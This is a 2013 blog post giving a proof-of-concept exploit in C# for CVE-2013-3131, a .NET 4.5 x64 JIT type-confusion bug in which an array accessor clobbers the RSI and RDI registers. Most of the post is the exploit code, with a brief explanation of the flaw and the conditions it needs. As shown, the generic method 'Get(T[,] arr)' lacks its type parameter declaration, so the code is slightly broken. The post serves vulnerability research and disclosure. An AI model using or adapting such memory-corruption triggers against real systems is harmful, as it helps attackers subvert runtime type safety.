# Wednesday, 10 July 2013
« Overriding a Final Finalize | Main | Java Method Overriding Is FUBAR Part 7 o... »
Type Confusion PoC for CVE-2013-3131 (MS13-052)

I did not discover this vulnerability (Alon Fliess filed the (public) bug report), but I decided to investigate it and write a PoC exploit:

using System;
using System.Runtime.CompilerServices;

struct Foo {
  byte b1, b2, b3;
}

class U1 { }
class U2 { }

struct StackFields {
  internal object f1;
  internal U1 f2;
  internal U2 f3;
}

class Program {
  long field1;
  long field2;

  static void Main() {
    new Program().Get(new Foo[1, 1]);
  }

  [MethodImpl(MethodImplOptions.NoInlining)]
  object Get(T[,] arr) {
    StackFields fields = new StackFields();
    fields.f1 = new U1();
    fields.f2 = new U1();
    fields.f3 = new U2();
    arr.ToString();
    object v = arr[0, 0];
    field2 = field1;
    Console.WriteLine(fields.f3);
    return v;
  }
}

This requires .NET 4.5 x64 (and must be built/run in release mode).

The bug is that the array accessor that is generated clobbers the RSI and RDI registers.

Wednesday, 10 July 2013 13:05:47 (W. Europe Daylight Time, UTC+02:00)  #    Comments [1]